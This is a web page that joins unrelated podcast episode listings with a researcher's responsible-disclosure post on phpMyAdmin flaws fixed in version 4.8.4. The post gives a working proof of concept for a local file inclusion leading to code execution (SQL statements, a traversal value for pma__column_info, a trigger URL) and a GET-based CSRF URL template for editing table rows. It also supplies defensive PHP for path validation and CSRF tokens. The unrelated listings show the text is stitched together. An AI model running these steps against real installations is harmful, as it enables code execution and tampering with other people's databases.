
How to Become a Security Architect | Guest Leighton Johnson

Learn about the life of a security architect in this discussion with Leighton Johnson, the CTO and founder of ISFMT (Information Security Forensics Management Team). Leighton discusses how you can become a security architect, the typical job responsibilities and common pitfalls you may face, certifications that can help advance your security architect career, how security architecture is evolving, and more.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

The $9 Billion BEC Threat You Can’t Ignore | Guests Roger Sels and Jack Koziol

Business email compromise (BEC) attacks are expected to cost businesses $9 billion by the end of 2018, according to Trend Micro estimates. In this discussion with Roger Sels, VP information security at DarkMatter, and Jack Koziol, CEO of Infosec Institute, you'll learn more about BEC attacks and measures you can take now to protect your organization. Kristin Zurovitch, director of marketing at Infosec Institute, helps guide the discussion and takes listener questions.

How to Become an Incident Responder | Guest Keatron Evans

Learn about the path to becoming an incident responder and what a potential career may entail in this discussion with Keatron Evans, Infosec Institute instructor and managing consultant at KM Cyber Security, LLC. Evans discusses his path to incident response, what kinds of interests can translate into a successful incident response career, and what a day in the life as an incident responder is like.

PMP Certification: Boost Your Career and Earn More Money | Guest Chris Danek

Earning your PMP certification can increase your earnings by as much as 20 percent. A Project Management Professional (PMP) certification proves to employers that you know what it takes to manage projects efficiently, within budget and on schedule. Infosec Institute instructor Chris Danek and sales manager Jarrod Mayes discuss how the PMP certification process works and how it can help build your credibility in any industry. Kristin Zurovitch, director of marketing at Infosec Institute, helps guide the discussion and takes listener questions.

The Problem with Passwords | Guest Susan Morrow

Passwords remain at the heart of many cybersecurity issues, and this week we take a deep dive into the topic with Susan Morrow, who has worked in numerous areas of the IT security industry since the early 1990s. Morrow discusses the new NIST password guidelines, how organizations are lagging behind, and a variety of other password-related topics. The InfoSec Institute security awareness series highlights the importance of security education across all levels of an organization.

Privacy Certifications Boosted by New Regulations | Guest Aaron Stevens

California’s new privacy law will affect more than half a million U.S. companies when it goes into effect on January 1, 2020, and that's just one piece of the evolving privacy landscape. In this discussion with IAPP channels manager Aaron Stevens, we discuss how organizations are being impacted by privacy regulations, the surging popularity of privacy certifications, and how an IAPP privacy certification can help boost your career.

How to Become a Computer Forensics Investigator | Guest Amber Schroader

Paraben CEO Amber Schroader discusses her path to becoming a computer forensics investigator and provides advice to those who may be considering computer forensics as a career. Schroader talks about the challenges of the field, the misconceptions and growth brought about by TV shows, and the fact that forensics is a science rather than an art.

CRISC Roadmap: The Highest-Paying Certification | Guest Leighton Johnson

Professionals with the Certified in Risk and Information Systems Control (CRISC) certification earn an average of $127,507 each year, making it the highest-paying IT certification available. Leighton Johnson, the CTO of Information Security Forensics Management Team and a CRISC-certified professional, discusses how earning your CRISC can open new career opportunities, as well as what the CRISC certification process is like. Kristin Zurovitch, director of marketing at Infosec Institute, helps guide the discussion and takes listener questions.

Post GDPR Best Practices | Guest Susan Morrow

It's been three months since the EU's General Data Protection Regulation (GDPR) went into effect. Returning guest Susan Morrow and host Chris Sienko take a look back at the initial rollout of GDPR, the compliance steps organizations have taken so far, and the potential future impact of GDPR.

How to Become a Network Admin | Guest Elias Papatestas

Learn about the path to becoming a network admin and what a potential career may entail in this discussion with Elias Papatestas, an Infosec Institute instructor who has extensive history in the IT industry dating back to the 1980s.

Cybersecurity Startups and Minority Representation | Guest Ron Gula

Ron Gula, president of Gula Tech Adventures and co-founder of Tenable Network Security, talks about the evolution of cybersecurity and security awareness, his career shift from the NSA to growing Tenable to funding other cybersecurity startups, and a variety of other topics.

phpMyAdmin multiple vulnerabilities

During an assignment, I found several serious vulnerabilities in phpMyAdmin, an application widely used to manage MariaDB and MySQL databases. One of them is a local file inclusion that can lead to arbitrary code execution; the other is a CSRF that allows any table row to be edited.

1. Local file inclusion in the transformation feature

The transformation feature of phpMyAdmin lets you define a specific rendering for a column when it is selected from a table. For example, it can turn a URL stored as plain text into a clickable link when the row is displayed.

Those transformations are defined in phpMyAdmin's "column_info" system table, which usually resides in the phpmyadmin database. However, every database can also ship its own copy of the phpMyAdmin system tables. To create them for a specific database, call: http://phpmyadmin/chk_rel.php?fixall_pmadb=1&db=*yourdb*.
This creates a set of pma__* tables in that database.

Here is an example of how the transformation is applied, from tbl_replace.php:

<?php

$mime_map = Transformations::getMIME($GLOBALS['db'], $GLOBALS['table']);
[...]
// Apply Input Transformation if defined
if (!empty($mime_map[$column_name])
    && !empty($mime_map[$column_name]['input_transformation'])
) {
    $filename = 'libraries/classes/Plugins/Transformations/'
        . $mime_map[$column_name]['input_transformation'];
    if (is_file($filename)) {
        include_once $filename;
        $classname = Transformations::getClassName($filename);
        /** @var IOTransformationsPlugin $transformation_plugin */
        $transformation_plugin = new $classname();
        $transformation_options = Transformations::getOptions(
            $mime_map[$column_name]['input_transformation_options']
        );
        $current_value = $transformation_plugin->applyTransformation(
            $current_value, $transformation_options
        );
        // check if transformation was successful or not
        // and accordingly set error messages & insert_fail
        if (method_exists($transformation_plugin, 'isSuccess')
            && !$transformation_plugin->isSuccess()
        ) {
            $insert_fail = true;
            $row_skipped = true;
            $insert_errors[] = sprintf(
                __('Row: %1$s, Column: %2$s, Error: %3$s'),
                $rownumber, $column_name,
                $transformation_plugin->getError()
            );
        }
    }
}

The transformation is fetched from the "pma__column_info" system table of the current database, or from the one in the "phpmyadmin" database otherwise. The value of the "input_transformation" column is appended to the plugin directory and used as the file name to include. It is not sanitised, so "../" segments traverse out of that directory and the include becomes a local file inclusion. The is_file() check does not help: it only requires that the target exists and is a regular file, which a PHP session file is.

Here is a PoC for this vulnerability:

  1. Create a database "foo" with a table "bar" containing a column "baz", and insert a row whose value is PHP code (this is how the PHP code ends up in the session file):
    CREATE DATABASE foo;
    CREATE TABLE foo.bar ( baz VARCHAR(255) PRIMARY KEY );
    INSERT INTO foo.bar SELECT '<?php phpinfo() ?>';
  2. Create the phpMyAdmin system tables in that database by calling http://phpmyadmin/chk_rel.php?fixall_pmadb=1&db=foo
  3. Fill in the transformation information, with the path traversal, in the "pma__column_info" table ([path_traversal] stands for enough "../" segments to reach the filesystem root from the plugin directory, and {yourSessionId} is your own session ID):
    INSERT INTO `pma__column_info` SELECT '1', 'foo', 'bar', 'baz', 'plop',
     'plop', 'plop', 'plop',
     '[path_traversal]/var/lib/php/sessions/sess_{yourSessionId}', 'plop';
  4. Browsing to http://phpmyadmin/tbl_replace.php?db=foo&table=bar&where_clause=1=1&fields_name[multi_edit][][]=baz&clause_is_unique=1 triggers the phpinfo() call.
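As an added example (my own code, not phpMyAdmin's), the script below puts the vulnerable lookup pattern from tbl_replace.php next to a hardened resolver and runs both over constructed pma__column_info values, including the PoC value above with [path_traversal] spelled out. It builds a throwaway directory tree under the system temp directory so it runs without a phpMyAdmin install; the directory layout, the plugin file name and the session file name are assumptions.

```php
<?php
declare(strict_types=1);

// Added example, not phpMyAdmin's code. resolveVulnerable() mirrors the lookup
// in tbl_replace.php; resolveHardened() is the check a reviewer would expect.
// Directory layout, plugin name and session file name are assumptions.

function resolveVulnerable(string $pluginDir, string $inputTransformation): ?string
{
    // Same pattern as the vulnerable code: concatenate, then is_file().
    // is_file() is not a defence: any existing regular file, including a PHP
    // session file reached through ../ segments, passes it.
    $filename = $pluginDir . '/' . $inputTransformation;
    return is_file($filename) ? $filename : null;
}

function resolveHardened(string $pluginDir, string $inputTransformation): ?string
{
    // 1. Allow-list the shape: an optional Input/ or Output/ subfolder and a
    //    plain identifier ending in .php. "../", absolute paths, NUL bytes
    //    and sess_* names all fail here.
    if (preg_match('#^(?:Input/|Output/)?[A-Za-z0-9_]+\.php\z#', $inputTransformation) !== 1) {
        return null;
    }
    // 2. Canonicalise and require the result to stay below the plugin
    //    directory, so a symlink inside the tree cannot point outside it.
    $base = realpath($pluginDir);
    $candidate = realpath($pluginDir . '/' . $inputTransformation);
    if ($base === false || $candidate === false) {
        return null;
    }
    if (strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $candidate;
}

// --- constructed fixture: fake web root and fake PHP session directory ---
$root = sys_get_temp_dir() . '/pma_lfi_demo_' . bin2hex(random_bytes(4));
$pluginDir = $root . '/www/libraries/classes/Plugins/Transformations';
$sessionDir = $root . '/var/lib/php/sessions';
mkdir($pluginDir . '/Input', 0700, true);
mkdir($sessionDir, 0700, true);
file_put_contents($pluginDir . '/Input/Text_Plain_Iptolong.php', "<?php // stand-in plugin\n");
file_put_contents($sessionDir . '/sess_deadbeef', "<?php phpinfo() ?>\n");

// Constructed input_transformation values: a legitimate plugin, the PoC value
// (five levels up reach $root in this layout) and a plugin that does not exist.
$rows = [
    'Input/Text_Plain_Iptolong.php',
    '../../../../../var/lib/php/sessions/sess_deadbeef',
    'Input/Does_Not_Exist.php',
];
foreach ($rows as $value) {
    printf("%-52s vulnerable: %-8s hardened: %s\n", $value,
        resolveVulnerable($pluginDir, $value) === null ? 'reject' : 'INCLUDE',
        resolveHardened($pluginDir, $value) === null ? 'reject' : 'include');
}

// Remove the fixture again.
$it = new RecursiveIteratorIterator(
    new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS),
    RecursiveIteratorIterator::CHILD_FIRST
);
foreach ($it as $entry) {
    $entry->isDir() ? rmdir($entry->getPathname()) : unlink($entry->getPathname());
}
rmdir($root);
```

The vulnerable resolver happily returns the session file for the PoC value, while the hardened one rejects it at the allow-list step before realpath() is even consulted. The same validation belongs wherever a pma__column_info column is turned into a file name, and a defender can audit the input_transformation column of every pma__column_info table for values that are not plain plugin names, since a traversal payload has to be stored there first.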


2. CSRF for updating data in a table

This vulnerability is easy to understand: a simple GET request is enough to update data in a table. Here is an example:

http://phpmyadmin/tbl_replace.php?db=*yourDB*&table=*yourTable*&fields_name[multi_edit][0][0]=*fieldToEdit*&fields[multi_edit][0][0]=*fieldNewValue*&clause_is_unique=1&where_clause=*whereClause*

A malicious user can therefore make a logged-in user update arbitrary tables in arbitrary databases. Since the request is a plain GET, it can even be embedded in an <img> element on a forum or anywhere else the victim browses.
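As an added example (again my own code, not phpMyAdmin's), here is the guard such an endpoint needs: refuse anything that is not a POST, and require a per-session token that the attacker's page cannot know. The session is modelled as a plain array so the script runs from the CLI; function and parameter names are assumptions.

```php
<?php
declare(strict_types=1);

// Added example, not phpMyAdmin's code: a minimal CSRF guard for a
// state-changing endpoint such as tbl_replace.php. $session stands in for
// $_SESSION, $method for $_SERVER['REQUEST_METHOD'] and $post for $_POST.

function issueCsrfToken(array &$session): string
{
    // One 256-bit random token per login session, from the CSPRNG. The
    // application embeds it in its own forms as a hidden field.
    if (!isset($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/** Returns null when the write may proceed, or the reason it was refused. */
function checkWriteRequest(array $session, string $method, array $post): ?string
{
    // A write must never be reachable through a bare GET: that is exactly what
    // lets an <img src="..."> on a third-party page fire it with the victim's
    // cookies attached.
    if ($method !== 'POST') {
        return 'method not allowed';
    }
    if (!isset($session['csrf_token'], $post['token']) || !is_string($post['token'])) {
        return 'missing token';
    }
    // Constant-time comparison: a plain === leaks, byte by byte, how much of
    // the token a guess got right.
    if (!hash_equals($session['csrf_token'], $post['token'])) {
        return 'token mismatch';
    }
    return null;
}

// --- constructed requests against one session ---
$session = [];
$token = issueCsrfToken($session);
$update = [
    'db' => 'foo', 'table' => 'bar', 'where_clause' => '1=1', 'clause_is_unique' => '1',
    'fields_name' => ['multi_edit' => [['baz']]],
    'fields' => ['multi_edit' => [['pwned']]],
];
$cases = [
    'GET from an <img> tag, as in the vulnerable version' => ['GET', $update],
    'POST without a token' => ['POST', $update],
    'POST with a guessed token' => ['POST', $update + ['token' => str_repeat('0', 64)]],
    'POST from the application form' => ['POST', $update + ['token' => $token]],
];
foreach ($cases as $label => [$method, $post]) {
    $verdict = checkWriteRequest($session, $method, $post);
    printf("%-52s %s\n", $label, $verdict ?? 'allowed');
}
```

Only the last case is allowed. Setting the session cookie with SameSite=Lax (session_set_cookie_params() accepts a samesite option since PHP 7.3) is worth adding as a second layer, since browsers then omit the cookie from cross-site subresource loads such as <img>, but it does not replace the token: the check has to happen on the server.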


Both vulnerabilities are serious. We disclosed them responsibly and they were fixed in the newly released phpMyAdmin 4.8.4.


Timeline:

  • 2018.06.21 – Initial contact with phpMyAdmin security team.
  • 2018.06.24 – Initial response that the team will investigate.
  • 2018.08.02 – Request for news.
  • 2018.08.28 – Re-request for news.
  • 2018.08.31 – Response from phpMyAdmin team that they’re still in the process of fixing things.
  • 2018.11.01 – Request for news.
  • 2018.12.07 – Apologies from phpMyAdmin + explanation that a lot of code rewrite was necessary for multiple CSRF flaws.
  • 2018.12.11 – New version released with patch.

Update your things! 😉
